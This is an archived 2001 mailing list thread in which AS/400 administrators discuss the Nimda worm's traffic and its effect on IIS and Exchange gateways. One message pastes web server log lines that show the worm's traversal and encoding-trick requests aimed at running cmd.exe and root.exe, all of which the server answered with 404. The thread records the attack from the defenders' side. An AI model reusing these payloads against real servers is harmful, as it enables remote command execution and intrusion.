× The internal search function is temporarily non-functional. The current search engine is no longer viable and we are researching alternatives.
As a stop gap measure, we are using Google's custom search engine service.
If you know of an easy to use, open source, search engine ... please contact support@midrange.com.



This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.
--
[ Picked text/plain from multipart/alternative ]
                                We also saw an increase in traffic.  No
impact on our extranet site.

                                Now for our PCS systems that use IIS for
presentation and our SMTP gateway (which inadvertently had IIS running) it's
a different story.  Good news is, it didn't affect my job.  Well unless you
count the three days we couldn't use our Exchange SMTP gateway and didn't
have outside mail.........


                                Michael Crump
                                Saint-Gobain Containers
                                1509 S. Macedonia Ave.
                                Muncie, IN  47302
                                (765)741-7696
                                (765)741-7012 f
                                (800)428-8642

                                mailto:mike.crump@saint-gobain.com






        "Joel R. Cochran" <jrc@masi-brac.com>
                        10/04/01 02:51 PM
                        Please respond to midrange-l

        To:     midrange-l@midrange.com
        cc:
        Subject:        RE: NIMDA Virus - Anyone been affected by it ?


                                Ditto, increased our traffic by 300%.  Mind
you it didn't phase our machine
                                or appear to have any effect on our users,
but I couldn't figure out how to
                                prevent it.  Thank goodness for the good old
HTTP Server.

                                For those who aren't sure what we are
referring to, here is a snippet from
                                the HTTP log file.  We were all sitting
around the office laughing at these
                                stupid Windows requests on a 400...

                                "GET /scripts/root.exe?/c+dir HTTP/1.0" 404
232
                                "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
232
                                "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
                                "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
                                "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
                                "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
                                HTTP/1.0" 404 232
                                "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
                                HTTP/1.0" 404 232
                                "GET

/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
                                stem32/cmd.exe?/c+dir HTTP/1.0" 404 232
                                "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
                                "GET /scripts/root.exe?/c+dir HTTP/1.0" 404
232
                                "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404
232
                                "GET /c/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
                                "GET /d/winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 232
                                "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
                                "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
                                HTTP/1.0" 404 232
                                "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
                                HTTP/1.0" 404 232
                                "GET

/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
                                stem32/cmd.exe?/c+dir HTTP/1.0" 404 232
                                "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
                                "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
                                "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
                                "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
                                "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
                                "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
                                "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
                                "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232

                                This went on for over a week from literally
hundreds of IP addresses.  Our
                                ISP had no idea what to do, so we just let
it run it's course.  You'll
                                notice, of course, that the response code on
each one of these is 404, so
                                they never hurt anything.

                                Joel R. Cochran
                                Director of Internet Services
                                VamaNet.com
                                800-480-8810 (va toll free)
                                540-885-8050 (phone)
                                540-886-1589 (fax)
                                www.vamanet.com
                                mailto:custservice@vamanet.com


                                >-----Original Message-----
                                >From: Larryt222@aol.com
[mailto:Larryt222@aol.com]
                                >Sent: Thursday, October 04, 2001 3:09 PM
                                >To: midrange-l@midrange.com
                                >Subject: Re: NIMDA Virus - Anyone been
affected by it ?
                                >
                                >
                                >Why NIMDA did nothing to our 400, the site
was hit an average
                                >of 8,000 times a day which caused our
stores to get slower
                                >response because of all the trafic on the
line.  NIMDA was
                                >trying to execute NT code which as you know
does not execute
                                >on the 400. It appears that once they have
an IP address NIMDA
                                >keeps on trying to contact that IP.
                                >
                                >Larry T.

>_______________________________________________
                                >This is the Midrange Systems Technical
Discussion (MIDRANGE-L)
                                >mailing list
                                >To post a message email:
MIDRANGE-L@midrange.com
                                >To subscribe, unsubscribe, or change list
options,
                                >visit:
http://lists.midrange.com/cgi-bin/listinfo/midrange-l
                                >or email: MIDRANGE-L-request@midrange.com
                                >Before posting, please take a moment to
review the archives
                                >at http://archive.midrange.com/midrange-l.
                                >

_______________________________________________
                                This is the Midrange Systems Technical
Discussion (MIDRANGE-L) mailing list
                                To post a message email:
MIDRANGE-L@midrange.com
                                To subscribe, unsubscribe, or change list
options,
                                visit:
http://lists.midrange.com/cgi-bin/listinfo/midrange-l
                                or email: MIDRANGE-L-request@midrange.com
                                Before posting, please take a moment to
review the archives
                                at http://archive.midrange.com/midrange-l.




As an Amazon Associate we earn from qualifying purchases.

This thread ...


Follow On AppleNews
Return to Archive home page | Return to MIDRANGE.COM home page

This mailing list archive is Copyright 1997-2024 by midrange.com and David Gibbs as a compilation work. Use of the archive is restricted to research of a business or technical nature. Any other uses are prohibited. Full details are available on our policy page. If you have questions about this, please contact [javascript protected email address].

Operating expenses for this site are earned using the Amazon Associate program and Google Adsense.